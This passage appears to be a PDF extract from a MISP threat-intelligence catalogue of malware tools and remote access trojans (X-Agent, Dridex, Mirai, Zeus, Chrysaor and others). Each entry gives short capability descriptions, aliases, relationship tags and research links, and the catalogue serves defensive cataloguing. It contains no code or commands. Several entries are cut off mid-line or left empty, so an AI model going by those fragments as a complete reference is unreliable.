The tag is: misp-galaxy:tool="HerHer Trojan"
**Helminth backdoor**

The tag is: *misp-galaxy:tool=*Helminth backdoor*"

**HDRoot**

The tag is: *misp-galaxy:tool=*HDRoot*"

**IRONGATE**

The tag is: *misp-galaxy:tool=*IRONGATE*"

**ShimRAT**

The tag is: *misp-galaxy:tool=*ShimRAT*"

**X-Agent**

APT28's second-stage persistent macOS backdoor. This backdoor component is known to have a modular structure featuring various espionage functionalities, such as key-logging, screen grabbing.
and file exfiltration. This component is available for Osx, Windows, Linux and iOS operating systems.

Xagent is a modular backdoor with spying functionalities such as keystroke logging and file exfiltration. Xagent is the group’s flagship backdoor and heavily used in their operations. Early versions for Linux and Windows were seen years ago, then in 2015 an iOS version came out. One year later, an Android version was discovered and finally, in the beginning of 2017, an Xagent sample for OS X was described.

The tag is: misp-galaxy:tool="X-Agent"

X-Agent is also known as:

- XAgent

X-Agent has relationships with:

- similar: misp-galaxy:mitre-malware="CHOPSTICK - S0023" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-malware="X-Agent for Android - S0314" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:tool="CHOPSTICK" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="X-Agent (Android)" with estimative-language:likelihood-probability="likely"

Table 6329. Table References

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<tr>
<td><a href="https://app.box.com/s/l7n781ig6n8wlf1aff5hgwbbh4qoi5jqq">https://app.box.com/s/l7n781ig6n8wlf1aff5hgwbbh4qoi5jqq</a></td>
</tr>
<tr>
<td><a href="https://objective-see.com/blog/blog_0x25.html#XAgent">https://objective-see.com/blog/blog_0x25.html#XAgent</a></td>
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</table>

**X-Tunnel**

The tag is: misp-galaxy:tool="X-Tunnel"

X-Tunnel is also known as:

- XTunnel

X-Tunnel has relationships with:

- similar: misp-galaxy:mitre-malware="XTunnel - S0117" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="XTunnel" with estimative-language:likelihood-
Foozer

The tag is: misp-galaxy:tool="Foozer"

Table 6330. Table References

Links
https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

WinIDS

The tag is: misp-galaxy:tool="WinIDS"

Table 6331. Table References

Links
https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

DownRange

The tag is: misp-galaxy:tool="DownRange"

Table 6332. Table References

Links
https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

Mad Max

The tag is: misp-galaxy:tool="Mad Max"

Mad Max has relationships with:

• similar: misp-galaxy:botnet="Madmax" with estimative-language:likelihood-probability="likely"

Table 6333. Table References

Links
https://www.arbornetworks.com/blog/asert/mad-max-dga/

Crimson

Crimson is malware used as part of a campaign known as Operation Transparent Tribe that targeted Indian diplomatic and military victims

The tag is: misp-galaxy:tool="Crimson"
Crimson has relationships with:

- similar: misp-galaxy:rat="Crimson" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-malware="Crimson - S0115" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Crimson RAT" with estimative-language:likelihood-probability="likely"

Table 6334. Table References

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<tr>
<td><a href="https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF">https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF</a></td>
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</table>

**Prikormka**

Operation Groundbait based on our research into the Prikormka malware family. This includes detailed technical analysis of the Prikormka malware family and its spreading mechanisms, and a description of the most noteworthy attack campaigns.

The tag is: misp-galaxy:tool="Prikormka"

Prikormka has relationships with:

- similar: misp-galaxy:mitre-malware="Prikormka - S0113" with estimative-language:likelihood-probability="likely"

Table 6335. Table References

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**NanHaiShu**

This whitepaper details a malicious program we identify as NanHaiShu. Based on our analysis, the threat actor behind this malware targets government and private-sector organizations.

The tag is: misp-galaxy:tool="NanHaiShu"

NanHaiShu has relationships with:

- similar: misp-galaxy:mitre-malware="NanHaiShu - S0228" with estimative-language:likelihood-probability="likely"

Table 6336. Table References

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</table>
Umbreon

Umbreon (sharing the same name as the Pokémon) targets Linux systems, including systems running both Intel and ARM processors, expanding the scope of this threat to include embedded devices as well.

The tag is: `misp-galaxy:tool="Umbreon"`

Umbreon has relationships with:

- similar: `misp-galaxy:mitre-malware="Umbreon - S0221"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Umbreon"` with `estimative-language:likelihood-probability="likely"

Table 6337. Table References

Links


Odinaff

Odinaff is typically deployed in the first stage of an attack, to gain a foothold onto the network, providing a persistent presence and the ability to install additional tools onto the target network. These additional tools bear the hallmarks of a sophisticated attacker which has plagued the financial industry since at least 2013–Carbanak. This new wave of attacks has also used some infrastructure that has previously been used in Carbanak campaigns.

The tag is: `misp-galaxy:tool="Odinaff"`

Odinaff has relationships with:

- similar: `misp-galaxy:malpedia="Odinaff"` with `estimative-language:likelihood-probability="likely"

Table 6338. Table References

Links


Hworm

Unit 42 has observed a new version of Hworm (or Houdini) being used within multiple attacks. This blog outlines technical details of this new Hworm version and documents an attack campaign making use of the backdoor. Of the samples used in this attack, the first we observed were June
2016, while as-of publication we were still seeing attacks as recently as mid-October, suggesting that this is likely an active, ongoing campaign.

The tag is: \textit{misp-galaxy:tool}="Hworm"

Hworm is also known as:

- Houdini

\textit{Table 6339. Table References}

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**Backdoor.Dripion**

Backdoor.Dripion was custom developed, deployed in a highly targeted fashion, and used command and control servers disguised as antivirus company websites.

The tag is: \textit{misp-galaxy:tool}="Backdoor.Dripion"

Backdoor.Dripion is also known as:

- Dripion

\textit{Table 6340. Table References}

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**Adwind**

Adwind is a backdoor written purely in Java that targets system supporting the Java runtime environment. Commands that can be used, among other things, to display messages on the system, open URLs, update the malware, download/execute files, and download/load plugins. A significant amount of additional functionality can be provided through downloadable plugins, including such things as remote control options and shell command execution.

The tag is: \textit{misp-galaxy:tool}="Adwind"

Adwind is also known as:

- AlienSpy
- Frutas
- Unrecom
- Sockrat
- jSocket
- jRat
• Backdoor:Java/Adwind

Adwind has relationships with:

• similar: misp-galaxy:rat="Adwind RAT" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:android="Adwind" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:android="Sockrat" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="AdWind" with estimative-language:likelihood-probability="likely"

Table 6341. Table References

Links
https://securelist.com/blog/research/73660/adwind-faq/

Bedep

The tag is: misp-galaxy:tool="Bedep"

Bedep has relationships with:

• similar: misp-galaxy:malpedia="Bedep" with estimative-language:likelihood-probability="likely"

Cromptui

The tag is: misp-galaxy:tool="Cromptui"

Dridex

Dridex is a strain of banking malware that leverages macros in Microsoft Office to infect systems. Once a computer has been infected, Dridex attackers can steal banking credentials and other personal information on the system to gain access to the financial records of a user.

The tag is: misp-galaxy:tool="Dridex"

Dridex is also known as:

• Cridex

Dridex has relationships with:

• similar: misp-galaxy:banker="Dridex" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Dridex" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:banker="Feodo" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Feodo" with estimative-language:likelihood-probability="likely"
Fareit

The tag is: `misp-galaxy:tool="Fareit"`

Fareit has relationships with:

- similar: `misp-galaxy:malpedia="Pony"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:tool="Hancitor"` with `estimative-language:likelihood-probability="likely"`

Gafgyt

The tag is: `misp-galaxy:tool="Gafgyt"`

Gafgyt has relationships with:

- similar: `misp-galaxy:malpedia="Bashlite"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:botnet="Gafgyt"` with `estimative-language:likelihood-probability="likely"`

Gamarue

The tag is: `misp-galaxy:tool="Gamarue"`

Gamarue is also known as:

- Andromeda

Gamarue has relationships with:

- similar: `misp-galaxy:malpedia="Andromeda"` with `estimative-language:likelihood-probability="likely"`

Necurs

The Necurs botnet is a distributor of many pieces of malware, most notably Locky.

The tag is: `misp-galaxy:tool="Necurs"`
Necurs has relationships with:

- similar: misp-galaxy:malpedia="Necurs" with estimative-language:likelihood-probability="likely"

**Palevo**

The tag is: `misp-galaxy:tool="Palevo"`

**Akbot**

The tag is: `misp-galaxy:tool="Akbot"`

Akbot is also known as:

- Qbot
- Qakbot
- PinkSlipBot

Akbot has relationships with:

- similar: misp-galaxy:banker="Qakbot" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:botnet="Akbot" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="QakBot" with estimative-language:likelihood-probability="likely"

**Upatre**

Upatre is a Trojan downloader that is used to set up other threats on the victim’s PC. Upatre has been used recently in several high profile Trojan attacks involving the Gameover Trojan.

The tag is: `misp-galaxy:tool="Upatre"`

Upatre has relationships with:
Vawtrak

Vawtrak is an information stealing malware family that is primarily used to gain unauthorised access to bank accounts through online banking websites.

The tag is: *misp-galaxy:tool*="Vawtrak"

Vawtrak has relationships with:

- similar: *misp-galaxy:banker*="Vawtrak" with *estimative-language:likelihood-probability*="likely"
- similar: *misp-galaxy:malpedia*="Vawtrak" with *estimative-language:likelihood-probability*="likely"

Table 6346. Table References

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Empire

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

The tag is: *misp-galaxy:tool*="Empire"

Empire has relationships with:

- similar: *misp-galaxy:exploit-kit*="Empire" with *estimative-language:likelihood-probability*="likely"

Table 6347. Table References

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<tr>
<td><a href="https://github.com/adaptivethreat/Empire">https://github.com/adaptivethreat/Empire</a></td>
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Explosive

Beginning in late 2012, a carefully orchestrated attack campaign we call Volatile Cedar has been targeting individuals, companies and institutions worldwide. This campaign, led by a persistent attacker group, has successfully penetrated a large number of targets using various attack techniques, and specifically, a custom-made malware implant codenamed Explosive.
The tag is: *misp-galaxy:tool="Explosive"

Table 6348. Table References

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**KeyBoy**

The actors used a new version of “KeyBoy,” a custom backdoor first disclosed by researchers at Rapid7 in June 2013. Their work outlined the capabilities of the backdoor, and exposed the protocols and algorithms used to hide the network communication and configuration data.

The tag is: *misp-galaxy:tool="KeyBoy"

KeyBoy has relationships with:

- similar: *misp-galaxy:malpedia="KeyBoy"* with *estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:malpedia="Yahoyah"* with *estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:tool="Yahoyah"* with *estimative-language:likelihood-probability="likely"

Table 6349. Table References

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<tr>
<td><a href="https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india">https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india</a></td>
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**Yahoyah**

The attacks in this case are associated with a campaign called Tropic Trooper, which has been active since at least 2011 and is known for heavily targeting Taiwan. One of the attacks used their known Yahoyah malware...

The tag is: *misp-galaxy:tool="Yahoyah"

Yahoyah is also known as:

- W32/Seeav

Yahoyah has relationships with:

- similar: *misp-galaxy:malpedia="KeyBoy"* with *estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:malpedia="Yahoyah"* with *estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:tool="KeyBoy" with estimative-language:likelihood-probability="likely"

**Table 6350. Table References**

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**Tartine**

Delphi RAT used by Sofacy.

The tag is: `misp-galaxy:tool="Tartine"`

**Mirai**

Mirai (Japanese for "the future") is malware that turns computer systems running Linux into remotely controlled "bots", that can be used as part of a botnet in large-scale network attacks. It primarily targets online consumer devices such as remote cameras and home routers. The Mirai botnet has been used in some of the largest and most disruptive distributed denial of service (DDoS) attacks, including an attack on 20 September 2016 on computer security journalist Brian Krebs's web site, an attack on French web host OVH and the October 2016 Dyn cyberattack.

The tag is: `misp-galaxy:tool="Mirai"`

Mirai is also known as:

- Linux/Mirai

Mirai has relationships with:

- similar: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Mirai (ELF)" with estimative-language:likelihood-probability="likely"
- variant-of: misp-galaxy:botnet="Owari" with estimative-language:likelihood-probability="likely"
- variant-of: misp-galaxy:botnet="Sora" with estimative-language:likelihood-probability="likely"

**Table 6351. Table References**

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**Masuta**

IoT malware based on Mirai but slightly improved.

The tag is: `misp-galaxy:tool="Masuta"`
Masuta is also known as:

- PureMasuta

**BASHLITE**

The tag is: *misp-galaxy:tool="BASHLITE"*

**BlackEnergy**

BlackEnergy is a trojan which has undergone significant functional changes since it was first publicly analysed by Arbor Networks in 2007. It has evolved from a relatively simple DDoS trojan into a relatively sophisticated piece of modern malware with a modular architecture, making it a suitable tool for sending spam and for online bank fraud, as well as for targeted attacks. BlackEnergy version 2, which featured rootkit techniques, was documented by SecureWorks in 2010. The targeted attacks recently discovered are proof that the trojan is still alive and kicking in 2014. We provide a technical analysis of the BlackEnergy family, focusing on novel functionality and the differences introduced by new lite variants. We describe the most notable aspects of the malware, including its techniques for bypassing UAC, defeating the signed driver requirement in Windows and a selection of BlackEnergy2 plug-ins used for parasitic file infections, network discovery and remote code execution and data collection.

The tag is: *misp-galaxy:tool="BlackEnergy"*

BlackEnergy has relationships with:

- similar: *misp-galaxy:mitre-malware="BlackEnergy - S0089"* with estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:malpedia="BlackEnergy"* with estimative-language:likelihood-probability="likely"

**Trojan.Seaduke**

Trojan.Seaduke is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files.
The tag is: `misp-galaxy:tool="Trojan.Seaduke"`

Trojan.Seaduke is also known as:

- Seaduke

*Table 6354. Table References*

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</table>

**Backdoor.Tinybaron**

The tag is: `misp-galaxy:tool="Backdoor.Tinybaron"`

**Incognito RAT**

The tag is: `misp-galaxy:tool="Incognito RAT"`

**DownRage**

The tag is: `misp-galaxy:tool="DownRage"`

DownRage is also known as:

- Carberplike

*Table 6355. Table References*

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/Timo_Steffens/status/814781584536719360">https://twitter.com/Timo_Steffens/status/814781584536719360</a></td>
</tr>
</tbody>
</table>

**GeminiDuke**

GeminiDuke is malware that was used by APT29 from 2009 to 2012.

The tag is: `misp-galaxy:tool="GeminiDuke"`

GeminiDuke has relationships with:


*Table 6356. Table References*

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<tbody>
<tr>
<td><a href="https://attack.mitre.org/wiki/Software/S0049">https://attack.mitre.org/wiki/Software/S0049</a></td>
</tr>
</tbody>
</table>
Zeus

Trojan.Zbot, also called Zeus, is a Trojan horse that attempts to steal confidential information from the compromised computer. It may also download configuration files and updates from the Internet. The Trojan is created using a Trojan-building toolkit.

The tag is: `misp-galaxy:tool="Zeus"`

Zeus is also known as:

- Trojan.Zbot
- Zbot

Zeus has relationships with:

- similar: `misp-galaxy:banker="Zeus"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:botnet="Zeus"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Zeus"` with estimative-language:likelihood-probability="likely"

Table 6357. Table References

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Shifu

Shifu is a Banking Trojan first discovered in 2015. Shifu is based on the Shiz source code which incorporated techniques used by Zeus. Attackers use Shifu to steal credentials for online banking websites around the world, starting in Russia but later including the UK, Italy, and others.

The tag is: `misp-galaxy:tool="Shifu"`

Shifu has relationships with:

- similar: `misp-galaxy:malpedia="Shifu"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:tool="Shiz"` with estimative-language:likelihood-probability="likely"

Table 6358. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/">http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/</a></td>
</tr>
</tbody>
</table>

Shiz

The new variant of the Shiz Trojan malware targets mission-critical enterprise resource planning (ERP) applications — particularly SAP users.
The tag is: misp-galaxy:tool="Shiz"

Shiz has relationships with:

- similar: misp-galaxy:tool="Shifu" with estimative-language:likelihood-probability="likely"

Table 6359. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://securityintelligence.com/tag/shiz-trojan-malware/">https://securityintelligence.com/tag/shiz-trojan-malware/</a></td>
</tr>
</tbody>
</table>

**MM Core**

Also known as “BaneChant”, MM Core is a file-less APT which is executed in memory by a downloader component. It was first reported in 2013 under the version number “2.0-LNK” where it used the tag “BaneChant” in its command-and-control (C2) network request. A second version “2.1-LNK” with the network tag “StrangeLove” was discovered shortly after.

The tag is: misp-galaxy:tool="MM Core"

MM Core is also known as:

- MM Core backdoor
- BigBoss
- SillyGoose
- BaneChant
- StrangeLove

MM Core has relationships with:

- similar: misp-galaxy:malpedia="MM Core" with estimative-language:likelihood-probability="likely"

Table 6360. Table References

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**Shamoon**

Shamoon,[a] also known as Disttrack, is a modular computer virus discovered by Seculert[1] in 2012, targeting recent NT kernel-based versions of Microsoft Windows. The virus has been used for cyber espionage in the energy sector.[2][3][4] Its discovery was announced on 16 August 2012 by Symantec,[3] Kaspersky Lab,[5] and Seculert.[6] Similarities have been highlighted by Kaspersky Lab and Seculert between Shamoon and the Flame malware.[5][6]

The tag is: misp-galaxy:tool="Shamoon"
Shamoon is also known as:

- DistTrack

Shamoon has relationships with:

- similar: misp-galaxy:mitre-malware="Shamoon - S0140" with estimative-language:likelihood-probability="likely"

Table 6361. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://en.wikipedia.org/wiki/Shamoon">https://en.wikipedia.org/wiki/Shamoon</a></td>
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<tr>
<td><a href="https://securityaffairs.co/wordpress/78867/breaking-news/shamoon-virustotal.html">https://securityaffairs.co/wordpress/78867/breaking-news/shamoon-virustotal.html</a></td>
</tr>
</tbody>
</table>

**GhostAdmin**

According to MalwareHunterTeam and other researchers that have looked at the malware's source code, GhostAdmin seems to be a reworked version of CrimeScene, another botnet malware family that was active around 3-4 years ago.

The tag is: misp-galaxy:tool="GhostAdmin"

GhostAdmin has relationships with:

- similar: misp-galaxy:malpedia="GhostAdmin" with estimative-language:likelihood-probability="likely"

Table 6362. Table References

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**EyePyramid Malware**

Two Italians referred to as the “Occhionero brothers” have been arrested and accused of using malware and a carefully-prepared spear-phishing scheme to spy on high-profile politicians and businessmen. This case has been called “EyePyramid”, which we first discussed last week. (Conspiracy theories aside, the name came from a domain name and directory path that was found during the research.)

The tag is: misp-galaxy:tool="EyePyramid Malware"

Table 6363. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-inner-workings-eyepyramid/">http://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-inner-workings-eyepyramid/</a></td>
</tr>
</tbody>
</table>
LuminosityLink

LuminosityLink is a malware family costing $40 that purports to be a system administration utility.

The tag is: `misp-galaxy:tool="LuminosityLink"`

Table 6364. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/">http://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/</a></td>
</tr>
</tbody>
</table>

Flokibot

Floki Bot, described recently by Dr. Peter Stephenson from SC Magazine, is yet another bot based on the leaked Zeus code. However, the author came up with various custom modifications that makes it more interesting.

The tag is: `misp-galaxy:tool="Flokibot"`

Flokibot is also known as:

- Floki Bot
- Floki

Table 6365. Table References

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<tbody>
<tr>
<td><a href="https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/">https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/</a></td>
</tr>
</tbody>
</table>

ZeroT

Most recently, we have observed the same group targeting military and aerospace interests in Russia and Belarus. Since the summer of 2016, this group began using a new downloader known as ZeroT to install the PlugX remote access Trojan (RAT) and added Microsoft Compiled HTML Help (.chm) as one of the initial droppers delivered in spear-phishing emails.

The tag is: `misp-galaxy:tool="ZeroT"`

ZeroT has relationships with:

- similar: `misp-galaxy:mitre-malware="ZeroT - S0230"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="ZeroT"` with `estimative-language:likelihood-probability="likely"`

Table 6366. Table References
StreamEx

Cylance dubbed this family of malware StreamEx, based upon a common exported function used across all samples ‘stream’, combined with the dropper functionality to append ‘ex’ to the DLL file name. The StreamEx family has the ability to access and modify the user’s file system, modify the registry, create system services, enumerate process and system information, enumerate network resources and drive types, scan for security tools such as firewall products and antivirus products, change browser security settings, and remotely execute commands. The malware documented in this post was predominantly 64-bit, however, there are 32-bit versions of the malware in the wild.

The tag is: `misp-galaxy:tool="StreamEx"`

StreamEx has relationships with:

- similar: `misp-galaxy:mitre-malware="StreamEx - S0142"` with `estimative-language:likelihood-probability="likely"

adzok

Remote Access Trojan

The tag is: `misp-galaxy:tool="adzok"

Table 6368. Table References

Links

https://github.com/kevthehermit/RATDecoders

albertino

Remote Access Trojan

The tag is: `misp-galaxy:tool="albertino"

Table 6369. Table References

Links

https://github.com/kevthehermit/RATDecoders
**arcom**
Remote Access Trojan

The tag is: `misp-galaxy:tool="arcom"`

*Table 6370. Table References*

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<tbody>
<tr>
<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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**blacknix**
Remote Access Trojan

The tag is: `misp-galaxy:tool="blacknix"`

*Table 6371. Table References*

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<tr>
<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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</table>

**bluebanana**
Remote Access Trojan

The tag is: `misp-galaxy:tool="bluebanana"`

*Table 6372. Table References*

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<tr>
<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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</table>

**bozok**
Remote Access Trojan

The tag is: `misp-galaxy:tool="bozok"`

*Table 6373. Table References*

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<tr>
<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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**clientmesh**
Remote Access Trojan
cybergate
Remote Access Trojan
The tag is: misp-galaxy:tool="cybergate"

darkcomet
Remote Access Trojan
The tag is: misp-galaxy:tool="darkcomet"

darkrat
Remote Access Trojan
The tag is: misp-galaxy:tool="darkrat"

gh0st
Remote Access Trojan
The tag is: misp-galaxy:tool="gh0st"

gh0st has relationships with:

- similar: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-
Table 6378. Table References
Links
https://github.com/kevthehermit/RATDecoders

greame
Remote Access Trojan
The tag is: misp-galaxy:tool="greame"

Table 6379. Table References
Links
https://github.com/kevthehermit/RATDecoders

hawkeye
Remote Access Trojan
The tag is: misp-galaxy:tool="hawkeye"

Table 6380. Table References
Links
https://github.com/kevthehermit/RATDecoders

javadropper
Remote Access Trojan
The tag is: misp-galaxy:tool="javadropper"

Table 6381. Table References
Links
https://github.com/kevthehermit/RATDecoders

lostdoor
Remote Access Trojan
The tag is: misp-galaxy:tool="lostdoor"

Table 6382. Table References
Links
**luxnet**
Remote Access Trojan

The tag is: `misp-galaxy:tool="luxnet"`

*Table 6383. Table References*

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<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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**pandora**
Remote Access Trojan

The tag is: `misp-galaxy:tool="pandora"`

*Table 6384. Table References*

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<tr>
<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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</table>

**poisonivy**
Remote Access Trojan

The tag is: `misp-galaxy:tool="poisonivy"`

Poisonivy has relationships with:

- similar: `misp-galaxy:rat="PoisonIvy"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:mitre-malware="PoisonIvy - S0012"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="Poison Ivy"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:tool="Poison Ivy"` with `estimative-language:likelihood-probability="likely"`

*Table 6385. Table References*

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<tr>
<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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**predatorpain**
Remote Access Trojan
The tag is: misp-galaxy:tool="predatorpain"

Table 6386. Table References

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<tr>
<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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**punisher**

Remote Access Trojan

The tag is: misp-galaxy:tool="punisher"

Table 6387. Table References

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<tr>
<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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**qrat**

Remote Access Trojan

The tag is: misp-galaxy:tool="qrat"

qrat has relationships with:

- similar: misp-galaxy:rat="Qarallax" with estimative-language:likelihood-probability="likely"

Table 6388. Table References

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<tr>
<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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**shadowtech**

Remote Access Trojan

The tag is: misp-galaxy:tool="shadowtech"

Table 6389. Table References

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<tr>
<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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</table>

**smallnet**

Remote Access Trojan

The tag is: misp-galaxy:tool="smallnet"
**spygate**

Remote Access Trojan

The tag is: *misp-galaxy:tool=*"spygate"*

**template**

Remote Access Trojan

The tag is: *misp-galaxy:tool=*"template"*

**tapaoux**

Remote Access Trojan

The tag is: *misp-galaxy:tool=*"tapaoux"*

**vantom**

Remote Access Trojan

The tag is: *misp-galaxy:tool=*"vantom"*
**virusrat**

Remote Access Trojan

The tag is: `misp-galaxy:tool="virusrat"`

*Table 6395. Table References*

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<tr>
<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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**xena**

Remote Access Trojan

The tag is: `misp-galaxy:tool="xena"`

*Table 6396. Table References*

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<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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**xtreme**

Remote Access Trojan

The tag is: `misp-galaxy:tool="xtreme"`

*Table 6397. Table References*

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<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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**darkddoser**

Remote Access Trojan

The tag is: `misp-galaxy:tool="darkddoser"`

*Table 6398. Table References*

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<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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**jspy**

Remote Access Trojan
The tag is: misp-galaxy:tool="jspy"

Table 6399. Table References

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<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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</table>

**xratre**

Remote Access Trojan

The tag is: misp-galaxy:tool="xratre"

Table 6400. Table References

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<td><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></td>
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**PupyRAT**

Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python.

The tag is: misp-galaxy:tool="PupyRAT"

Table 6401. Table References

<table>
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<tbody>
<tr>
<td><a href="https://github.com/n1nj4sec/pupy">https://github.com/n1nj4sec/pupy</a></td>
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</table>

**ELF_IMEIJ**

Linux Arm malware spread via RFIs in cgi-bin scripts. This backdoor executes commands from a remote malicious user, effectively compromising the affected system. It connects to a website to send and receive information.

The tag is: misp-galaxy:tool="ELF_IMEIJ"

Table 6402. Table References

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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/elf_imeij.a">https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/elf_imeij.a</a></td>
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</table>

**KHRAT**

KHRAT is a small backdoor that has three exports (functions), namely, K1, K2, and K3. K1 checks if the current user is an administrator. If not, it uninstalls itself by calling the K2 function.
The tag is: `misp-galaxy:tool="KHRAT"`

KHRAT has relationships with:

- similar: `misp-galaxy:malpedia="KHRAT"` with `estimative-language:likelihood-probability="likely"`

**Trochilus**

The Trochilus RAT is a threatening RAT (Remote Access Trojan) that may evade many anti-virus programs. The Trochilus RAT is currently being used as part of an extended threat campaign in South East Asia. The first appearance of the Trochilus RAT in this campaign, which has been active since August of 2015, was first detected in the summer of 2015. The Trochilus RAT is currently being used against civil society organizations and government computers in the South East Asia region, particularly in attacks directed towards the government of Myanmar.

The tag is: `misp-galaxy:tool="Trochilus"`

Trochilus has relationships with:

- similar: `misp-galaxy:rat="Trochilus"` with `estimative-language:likelihood-probability="likely"`

**MoonWind**

The MoonWind sample used for this analysis was compiled with a Chinese compiler known as BlackMoon, the same compiler used for the BlackMoon banking Trojan. While a number of attributes match the BlackMoon banking Trojan, the malware is not the same. Both malware families were simply compiled using the same compiler, and it was the BlackMoon artifacts that resulted in the naming of the BlackMoon banking Trojan. But because this new sample is different from the BlackMoon banking Trojan,

The tag is: `misp-galaxy:tool="MoonWind"`

MoonWind has relationships with:

- similar: `misp-galaxy:rat="MoonWind"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:mitre-malware="MoonWind - S0149"` with `estimative-language:likelihood-probability="likely"`
Chrysaor

Chrysaor is spyware believed to be created by NSO Group Technologies, specializing in the creation and sale of software and infrastructure for targeted attacks. Chrysaor is believed to be related to the Pegasus spyware that was first identified on iOS and analyzed by Citizen Lab and Lookout.

The tag is: `misp-galaxy:tool="Chrysaor"`

Chrysaor is also known as:

- Pegasus
- Pegasus spyware

Chrysaor has relationships with:

- similar: `misp-galaxy:mitre-malware="Pegasus for iOS - S0289"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:mitre-malware="Pegasus for Android - S0316"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Chrysaor"` with estimative-language:likelihood-probability="likely"

Sathurbot

